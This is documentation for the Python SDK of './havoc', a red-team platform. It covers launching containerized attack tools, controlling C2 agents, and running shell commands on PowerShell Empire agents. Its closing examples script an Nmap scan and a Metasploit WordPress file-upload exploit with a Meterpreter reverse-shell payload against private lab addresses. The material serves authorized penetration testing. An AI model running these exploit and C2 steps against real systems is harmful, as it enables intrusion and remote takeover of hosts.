Usage Through SDK
Executing and interacting with ./havoc container tasks can be accomplished through the /task-control
API endpoint but the ./havoc Python SDK has pre-built methods that can be used to achieve the same end result.
A connection to the Campaign API must be created before you can launch or interact with container tasks. To connect to the Campaign API:
Start python:
python3
Import the havoc package and create the connection:
import havoc
api_domain_name = '<api_domain_name>'
api_region = '<api_region>'
api_key = '<api_key>'
secret = '<secret>'
h = havoc.Connect(api_region, api_domain_name, api_key, secret)
Launching Container Tasks
Container tasks can be launched as ECS tasks in your AWS account by using the run_task
or task_startup
methods of the havoc Python package. This approach will launch the container task using the ECS Cluster and Task Definitions that are provisioned as part of the ./havoc Campaign deployment. The run_task
method launches the task and immediately returns the ./havoc API response indicating whether or not the request to launch the task was successful. The task_startup
method launches the task and then waits for the task to report that it is ready.
response = h.run_task(task_name, task_type, task_host_name, task_domain_name, portgroups, end_time)
task_name
- (Required) a uniquely recognizable identifier to associate with the task.task_type
- (Required) specify the type of container task to be executed. See the Task Types section of the Administration Through SDK page for details on listing the available task types.task_host_name
- specify a host name for the task. Thetask_domain_name
value must also be set for thetask_host_name
value to be used. Iftask_host_name
is set, a resource record will be created in the hosted zone that corresponds with the domain name provided as thetask_domain_name
. If not provided, it defaults to'None'
.task_domain_name
- specify a domain name for the task. The domain name must be tracked as a domain resource by the Campaign API. See the Domains section of the Administration page for more details. Thetask_host_name
value must also be set for thetask_domain_name
value to be used. If not provided, it defaults to'None'
.portgroups
- include portgroups to be assigned to the task. The portgroups must be provided in the form of a list and each portgroup specified must be a valid, existing portgroup. If not set, it defaults to['None']
.end_time
- (Optional) specify a future time to automatically terminate the task. The value must be a date/time string that matches the format'%m/%d/%Y %H:%M:%S %z'
. If not set, it defaults to'None'
.
response = h.task_startup(task_name, task_type, task_host_name, task_domain_name, portgroups, end_time)
task_name
- (Required) a uniquely recognizable identifier to associate with the task.task_type
- (Required) specify the type of container task to be executed. See the Task Types section of the Administration Through SDK page for details on listing the available task types.task_host_name
- specify a host name for the task. Thetask_domain_name
value must also be set for thetask_host_name
value to be used. Iftask_host_name
is set, a resource record will be created in the hosted zone that corresponds with the domain name provided as thetask_domain_name
. If not provided, it defaults to'None'
.task_domain_name
- specify a domain name for the task. The domain name must be tracked as a domain resource by the Campaign API. See the Domains section of the Administration page for more details. Thetask_host_name
value must also be set for thetask_domain_name
value to be used. If not provided, it defaults to'None'
.portgroups
- include portgroups to be assigned to the task. The portgroups must be provided in the form of a list and each portgroup specified must be a valid, existing portgroup. If not set, it defaults to['None']
.end_time
- (Optional) specify a future time to automatically terminate the task. The value must be a date/time string that matches the format'%m/%d/%Y %H:%M:%S %z'
. If not set, it defaults to'None'
.
Launching Remote Container Tasks
One of the nice benefits of containerized attack tools is that the containers can run on any platform that supports Docker containers. In the ./havoc context, the term "remote container task" describes any container task that is not running in the ECS Cluster that is provisioned by the ./havoc Campaign deployment. Remote container tasks cannot be launched directly from the Campaign API but ./havoc container tasks are designed such that they can be run on any system that can run Docker containers. With the proper environment variables applied, container tasks will check in and register themselves with the Campaign so that they may be controlled via the Campaign API. To run a ./havoc container task directly in Docker, use the following command:
sudo docker run -d \
--name=<container-name> \
--network host \
--cap-add SYS_ADMIN \
-e "LOCAL_IP=$(hostname -I)" \
-e "CAMPAIGN_ID=<campaign-id>" \
-e "USER_ID=<campaign-user-id>" \
-e "TASK_NAME=<task-name>" \
-e "TASK_CONTEXT=<task-context>" \
-e "REMOTE_TASK=true" \
-e "API_KEY=<api-key>" \
-e "SECRET=<secret>" \
-e "API_DOMAIN_NAME=<api-domain-name>" \
-e "API_REGION=<api-region>" \
public.ecr.aws/havoc_sh/<task-type>:latest \
/usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
--name
- (Optional) provide a name that Docker will assign to the container.-e "LOCAL_IP=$(hostname -I)"
- (Required) if the container is being run on a Linux host, this option can be entered exactly as shown. Alternatively, the $(hostname -I) string can be replaced with a space separated list of IP addresses assigned to the host where the container is running.-e "CAMPAIGN_ID=<campaign-id>"
- (Required) this should be the value of your campaign's campaign_id that was provided as output from theterraform apply
command.-e "USER_ID=<campaign-user-id>"
- (Required) this should be the user ID associated with owner of the API key and secret that will be used to connect the container task to the Campaign API.-e "TASK_NAME=<task-name>"
- (Required) a unique name to associate with the task.-e "TASK_CONTEXT=<task-context>"
- (Required) the task_context should contain details about where the container task is running such as the site/location, machine name or both.-e "REMOTE_TASK=true"
- (Required) this parameter must be set totrue
for a remote container task.-e "API_KEY=<api-key>"
- (Required) replace<api-key>
with the actual API key value that will be used to connect the remote container task to the Campaign API.-e "SECRET=<secret>"
- (Required) replace<secret>
with the actual secret value that will be used to connect the remote container task to the Campaign API.-e "API_DOMAIN_NAME=<api-domain-name>"
- (Required) this should be the value of your campaign's api_domain_name that was provided as output from theterraform apply
command.-e "API_REGION=<api-region>"
- (Required) this should be the value of your campaign's api_region that was provided as output from theterraform apply
command.public.ecr.aws/havoc_sh/<task-type>:latest
- (Required) this should be the ./havoc public container registry's path for the container task type that you want to run. See the Container Tasks section for the ./havoc container registry details for each container task./usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
- (Required) this is the command that runs the specific applications that are required for the container task to function. It should be entered exactly as shown.
Verifying a Container Task
When creating automated playbooks, it can be helpful to verify that a required container task is present. The verify_task
method will accept task_name
and task_type
inputs and query the running container tasks to verify that the task is present and that it is of the specified task type. If the task is verified, the task's details are returned. Otherwise, the method returns a False
.
response = h.verify_task(task_name, task_type)
task_name
- (required) than name of the task to verify.task_type
- (required) the type of task that the given task name should be.
Interacting with Container Tasks
The interact_with_task
method is used to send instructions (a.k.a. instruct_command
) to a container task and then retrieve the results of the instruction. This method combines the operations of the instruct_task
and get_task_results
methods listed below. As such, there's no need to run the instruct_task
and get_task_results
methods individually if you're using the interact_with_task
method.
response = h.interact_with_task(task_name, instruct_instance, instruct_command, instruct_args)
task_name
- (required) the name of the task you want to instruct.instruct_instance
- (optional) a unique string to associate with the instruction (defaults to a random string).instruct_command
- (required) the command to send to the task.instruct_args
- (optional) a dictionary of arguments to pass with the command. Some commands have required arguments. See the Container Tasks section for details about available container task commands and their arguments.The value specified in the
instruct_instance
parameter is used by the container task to run the instruct_command in a Python class instance. This has the benefit of being able to send multiple commands to a container task and have them executed within the same class instance. For example, when working with a Metasploit container task, the process of staging an exploit requires sending several commands to configure the exploit. In this scenario, you could stage and configure an exploit using multiple commands with a sharedinstruct_instance
and then stage and configure the same exploit targeting a different host using a different sharedinstruct_instance
. This way, you can execute an exploit against multiple targets while keeping the executions and their resulting outputs separated from one another. This has an added side benefit of making it easy to group operations together. By using the sameinstruct_instance
value for commands executed across different container tasks, the resulting output from the tasks can be searched or filtered by their commoninstruct_instance
value. One drawback to this approach is that executing the sameinstruct_command
multiple times while using the sameinstruct_instance
will cause theinteract_with_task
command to return only the results for the first execution of the command, which may cause unintended results during custom playbook executions. As such, care should be taken to ensure that executing the same command multiple times is done using differentinstruct_instance
values for each command execution.
The instruct_task
method is used to send a command (a.k.a. instruct_command
) to a container task. See the Container Tasks section for information about commands available for each of the supported container tasks.
response = h.instruct_task(task_name, instruct_instance, instruct_command, instruct_args)
task_name
- (Required) the unique name associated with the container task that you want to instruct.instruct_instance
- (Optional) a value that can be associated with the instruction. If the parameter is excluded, a default value of 'havoc' is used.instruct_command
- (Required) the command to send to the container task.instruct_args
- (Optional) a Python dictionary containing any arguments that need to be passed along with the command. Some commands have required arguments. See the Container Tasks section for details about available container task commands and their arguments.
The value specified in the
instruct_instance
parameter is used by the container task to run the instruct_command in a Python class instance. This has the benefit of being able to send multiple commands to a container task and have them executed within the same class instance. For example, when working with a Metasploit container task, the process of staging an exploit requires sending several commands to configure the exploit. In this scenario, you could stage and configure an exploit using multiple commands with a sharedinstruct_instance
and then stage and configure the same exploit targeting a different host using a different sharedinstruct_instance
. This way, you can execute an exploit against multiple targets while keeping the executions and their resulting outputs separated from one another. This has an added side benefit of making it easy to group operations together. By using the sameinstruct_instance
value for commands executed across different container tasks, the resulting output from the tasks can be searched or filtered by their commoninstruct_instance
value.
If using the instruct_task
method, another method must be issued to gather the instruct_task
results. Container tasks write their output to a queue that can be queried by task_name
. The get_task_results
and get_filtered_task_results
methods can be used to query the queue. Results are returned in a list within the response dictionary. The key for the list is called 'queue' and can be accessed using response['queue']
.
response = get_task_results(task_name)
task_name
- (Required) the unique name associated with the container task that you want to get results for.
response = h.get_filtered_task_results(task_name, instruct_command, instruct_instance)
task_name
- (required) the name of the task to retrieve results from.instruct_instance
- (optional) the instruct_instance to retrieve results for.instruct_command
- (optional) the command to retrieve results for.
Waiting for an Idle Task
When a container task is processing an instruction, its task status is set to 'busy' and when the container task finishes processing the instruction and returns the instruction's results, the container task's status is reset to 'idle.' If you attempt to send an instruction to a busy task, you will receive a '409' error from the ./havoc API. Therefore, it's necessary to wait for a task to become idle again prior to sending another instruction. The wait_for_idle_task
method will periodically query a task and check its status. When 'idle' is returned as the status, the wait_for_idle_task
method will return the task's details.
response = h.wait_for_idle_task(task_name)
task_name
- (required) the name of the task that should be queried until it becomes idle.
Waiting for a C2 Agent or Session Connection
Container tasks that provide command and control capabilities have an agent_status_monitor
or session_status_monitor
event type that is triggered whenever a new agent or session connection is established with the task. It can be useful to continually poll the results queue until a new C2 connection is established. The wait_for_c2
method can be used for this purpose. When called, the wait_for_c2
method will generate a list of existing agents associated with the specified container task and then wait for a new agent_status_monitor
or session_status_monitor
event from the specified task to arrive in the queue. When the event arrives, the wait_for_c2
method returns the container task and agent/session details.
response = h.wait_for_c2(task_name)
task_name
- (required) the name of the task that the C2 agent or session will connect to.
Verifying a PowerShell Empire C2 Agent Exists
Before attempting to interact with an agent, it may be necessary to verify that an agent with the expected name is connected to the PowerShell Empire Container Task. The verify_agent
method exists for this purpose.
response = h.verify_agent(task_name, agent_name)
task_name
- (required) the name of the PowerShell Empire task that the C2 agent is associated with.agent_name
- (required) the name of the C2 agent to verify.
Executing a Shell Command on a PowerShell Empire Agent
Executing shell commands on a PowerShell Empire agent can be achieved through the instruct_task
and interact_with_task
methods but both of those methods require using the get_task_results
or get_filtered_task_results
method to gather the shell command's output. The execute_agent_shell_command
method will deliver a shell command request to the agent, poll the agent results until the output of the shell command is available, and then return the shell command output.
response = h.execute_agent_shell_command(task_name, agent_name, command, wait_for_results, completion_string)
task_name
- (required) the name of the PowerShell Empire task that the C2 agent is associated with.agent_name
- (required) the name of the C2 agent to execute the shell command on.command
- (required) the shell command to execute on the C2 agent.wait_for_results
- (optional) indicate whether the method should wait for the shell command results (True|False). Defaults to True.completion_string
- (optional) a string that should be present in the results to indicate the command execution is done. If not specified, results are returned as soon as any results data becomes available, which may lead to incomplete results being returned.
Executing a Module on a PowerShell Empire Agent
Executing a module on a PowerShell Empire agent can be achieved through the instruct_task
and interact_with_task
methods but both of those methods require using the get_task_results
or get_filtered_task_results
method to gather the module's output. The execute_agent_module
method will deliver a module execution request to the agent, poll the agent results until the output of the module is available, and then return the module output.
response = h.execute_agent_module(task_name, agent_name, module, module_args, wait_for_results, completion_string)
task_name
- (required) the name of the PowerShell Empire task that the C2 agent is associated with.agent_name
- (required) the name of the C2 agent to execute the module on.module
- (required) the name, including the full path of the module to execute on the C2 agent.module_args
- (optional) a dictionary containing arguments to be passed to the module.wait_for_results
- (optional) indicate whether the method should wait for the module results (True|False). Defaults to True.completion_string
- (optional) a string that should be present in the results to indicate the module execution is done. If not specified, results are returned as soon as any results data becomes available, which may lead to incomplete results being returned.The list of available modules and their configuration parameters can be retrieved from a PowerShell Empire Container Task by passing the
get_modules
PowerShell Empire Container Taskinstruct_command
via theinteract_with_task
method. See the Available Commands section of the PowerShell Empire Container Task page for more details.
Getting Execution Results from a PowerShell Empire Agent
When executing a shell command or module on a PowerShell Empire C2 agent, the execute_agent_shell_command
and execute_agent_module
methods will automatically retrieve the output from the executed command or module. But if you need to pull shell command or module execution results independently from the execution request, you can use the get_agent_results
method for that purpose. Technically, the interact_with_task
and instruct_task
methods can be used for that purpose as well but the results returned by the agent are compressed and encoded for efficiency purposes and the get_agent_results
method automatically decodes and decompresses the results.
response = h.get_agent_results(task_name, agent_name, task_id)
task_name
- (required) the name of the PowerShell Empire task that the C2 agent is associated with.agent_name
- (required) the name of the C2 agent to get execution results from.task_id
- (optional) the ID associated with the specific shell command or module execution task that you would like to get results for. Defaults to None meaning that all execution results available for the agent are returned.
Terminating Container Tasks
There are several options for terminating container tasks but the recommended approach is to use the task_shutdown
method or send the terminate
command through the instruct_task
method. This approach instructs the container task to shut itself down, which allows the container task to generate confirmation output indicating that the container task is terminating. When the container task's "terminating" message is received by the Campaign API, it will do the required clean up regarding the status of the task. The task_shutdown
method provides the added benefit of waiting for the task's "terminating" message to return, thereby confirming that the task was shutdown cleanly.
response = h.task_shutdown(task_name)
task_name
- (required) the name of the task that to shutdown.
This example shows how to terminate a task using the instruct_task
method:
task_name = 'my-task'
instruct_instance = 'foo'
instruct_command = 'terminate'
response = h.instruct_task(task_name, instruct_instance, instruct_command)
If a container task is unresponsive, you can force kill it using the kill_task
method. With this approach, the "terminating" output message will not be sent by the container task so the queue will not have confirmation from the container task that it was terminated. However, the Campaign API will still perform the required clean up regarding the status of the task including performing a forced shutdown of the ECS task.
response = h.kill_task(task_name)
task_name
- (required) the name of the task that to kill.
Remote container tasks can be terminated with either of the task_shutdown
and instruct_task
methods above however, the kill_task
method will not actually shutdown the container since the Campaign API does not have direct control over your remote Docker host. If a remote container task is unresponsive for some reason, you'll need to perform the sudo docker stop <container-id>
and sudo docker rm <container-id>
commands to actually shutdown and delete the container. In this scenario you would still use the kill_task
method to clean up the remote container task references in the Campaign API.
Examples
Nmap scan example
The example below performs the following operations:
- Launch an Nmap container task and verify that it is running
- Run an Nmap scan
- Get the scan results
- Terminate the Nmap container task
# Import the supporting Python packages.
import os
import string
import random
import pprint
import time as t
from datetime import datetime
# Import the havoc Python package.
import havoc
# Configure pretty print for displaying output.
pp = pprint.PrettyPrinter(indent=4)
# Setup the ./havoc Campaign API connection.
# Note that you should not hard code your API key and secret in a script.
# Use os.environ to pull the API key and secret values from environment variables.
api_region = "<my-api-region>"
api_domain_name = "<my-api-domain>"
api_key = os.environ['API_KEY']
secret = os.environ['SECRET']
h = havoc.Connect(api_region, api_domain_name, api_key, secret)
# Create a date string to use in the task name.
d = datetime.utcnow()
sdate = d.strftime('%m-%d-%Y')
# Launch an Nmap container task.
nmap_task_name = f'nmap_{sdate}'
nmap_task_type = 'nmap'
print(f'Launching {nmap_task_type} task type with name {nmap_task_name}')
h.run_task(nmap_task_name, nmap_task_type)
# Use list_tasks to show the running tasks.
tasks = h.list_tasks()
print('\nList of running tasks:')
pp.pprint(tasks)
# Use task_details to see the task's status (the task is ready when its status is "idle").
# A 'while' loop can be used to continually pull the tasks details until the task is idle.
task_status = None
task_details = None
while task_status != 'idle':
t.sleep(5)
task_details = h.get_task(nmap_task_name)
task_status = task_details['task_status']
print(f'\n{nmap_task_name} is ready:')
pp.pprint(task_details)
# Run an Nmap scan (set the instruct_command to 'run_scan').
nmap_instruct_command = 'run_scan'
# Use a random string for the instruct_instance.
nmap_instruct_instance = ''.join(random.choice(string.ascii_letters) for i in range(6))
# Set a target for the Nmap scan.
nmap_target = '172.28.128.0/24'
# Setup the instruct_args for the Nmap scan.
nmap_instruct_args = {'options': '-sV -T4 -Pn -p 8585 --open', 'target': nmap_target}
# Execute the scan.
print('\nRunning Nmap scan')
h.instruct_task(nmap_task_name, nmap_instruct_instance, nmap_instruct_command, nmap_instruct_args)
# Get the Nmap scan results.
# Pull the task results continually until output from the run_scan command is retrieved.
nmap_finished = None
while not nmap_finished:
t.sleep(5)
nmap_results = h.get_task_result(nmap_task_name)
for entry in nmap_results['queue']
if entry['instruct_command'] == nmap_instruct_command and entry['instruct_instance'] == nmap_instruct_instance:
nmap_finished = True
print(f'\n{nmap_task_name} {nmap_instruct_command} results:')
pp.pprint(entry)
# Terminate the task.
nmap_instruct_command = 'terminate'
print(f'Terminating task {nmap_task_name}')
h.instruct_task(nmap_task_name, nmap_instruct_instance, nmap_instruct_command)
Metasploit exploit example
The example below performs the following operations:
- Launch a Metasploit container task and verify that it is running
- Stage, configure and execute an exploit
- Get the exploit results
- Terminate the Metasploit container task
# Import the supporting Python packages.
import os
import string
import random
import pprint
import time as t
from datetime import datetime
# Import the havoc Python package.
import havoc
# Configure pretty print for displaying output.
pp = pprint.PrettyPrinter(indent=4)
# Setup the ./havoc Campaign API connection.
# Note that you should not hard code your API key and secret in a script.
# Use os.environ to pull the API key and secret values from environment variables.
api_region = "<my-api-region>"
api_domain_name = "<my-api-domain>"
api_key = os.environ['API_KEY']
secret = os.environ['SECRET']
h = havoc.Connect(api_region, api_domain_name, api_key, secret)
# Create a date string to use in the task name.
d = datetime.utcnow()
sdate = d.strftime('%m-%d-%Y')
# Launch a Metasploit container task.
metasploit_task_name = f'metasploit_{sdate}'
metasploit_task_type = 'metasploit'
print(f'Launching {metasploit_task_type} task type with name {metasploit_task_name}')
h.run_task(metasploit_task_name, metasploit_task_type)
# Use list_tasks to show the running tasks.
tasks = h.list_tasks()
print('\nList of running tasks:')
pp.pprint(tasks)
# Use task_details to see the task's status (the task is ready when its status is "idle").
# A 'while' loop can be used to continually pull the tasks details until the task is idle.
task_status = None
task_details = None
while task_status != 'idle':
t.sleep(5)
task_details = h.get_task(metasploit_task_name)
task_status = task_details['task_status']
print(f'\n{metasploit_task_name} is ready:')
pp.pprint(task_details)
# Stage a Metasploit exploit (set the instruct_command to 'set_exploit_module').
metasploit_instruct_command = 'set_exploit_module'
# Use a random string for the instruct_instance.
metasploit_instruct_instance = ''.join(random.choice(string.ascii_letters) for i in range(6))
# Setup the instruct_args to indicate which exploit to use.
# In this example, we're using the wp_ninja_forms_unauthenticated_file_upload exploit.
metasploit_instruct_args = {'exploit_module': 'multi/http/wp_ninja_forms_unauthenticated_file_upload'}
# Stage the exploit.
print('\nSetting exploit module')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to configure the exploit options.
target_ip = '172.28.128.95'
target_port = 8585
target_uri = '/wordpress/'
form_path = '/index.php/king-of-hearts/'
metasploit_instruct_command = 'set_exploit_options'
metasploit_instruct_args = {'RHOSTS': target_ip, 'RPORT': target_port, 'TARGETURI': target_uri, 'FORM_PATH': form_path}
# Configure the exploit options.
print('\nConfiguring exploit options')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to indicate the exploit target.
metasploit_instruct_command = 'set_exploit_target'
metasploit_instruct_args = {'exploit_target': 0}
# Configure the exploit target.
print('\nConfiguring exploit target')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to set the payload module.
metasploit_instruct_command = 'set_payload_module'
metasploit_instruct_args = {'payload_module': 'php/meterpreter/reverse_tcp'}
# Set the payload module.
print('\nSetting the payload module')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to configure the payload options.
metasploit_instruct_command = 'set_payload_options'
metasploit_instruct_args = {'LHOST': '172.28.128.5', 'LPORT': 80}
# Configure the payload options.
print('\nConfiguring the payload options')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Setup the instruct_command and instruct_args to execute the exploit.
metasploit_instruct_command = 'execute_exploit'
metasploit_instruct_args = None
# Execute the exploit.
print('\nExecuting the exploit')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command, metasploit_instruct_args)
# Get the Metasploit exploit results.
# Pull the task results continually until output from the execute_exploit command is retrieved.
metasploit_finished = None
while not metasploit_finished:
t.sleep(5)
metasploit_results = h.get_task_result(metasploit_task_name)
for entry in metasploit_results['queue']:
if entry['instruct_command'] == metasploit_instruct_command and entry['instruct_instance'] == metasploit_instruct_instance:
metasploit_finished = True
print(f'\n{metasploit_task_name} {metasploit_instruct_command} results:')
pp.pprint(entry)
# Terminate the task.
metasploit_instruct_command = 'terminate'
print(f'Terminating task {metasploit_task_name}')
h.instruct_task(metasploit_task_name, metasploit_instruct_instance, metasploit_instruct_command)
Updated about 1 year ago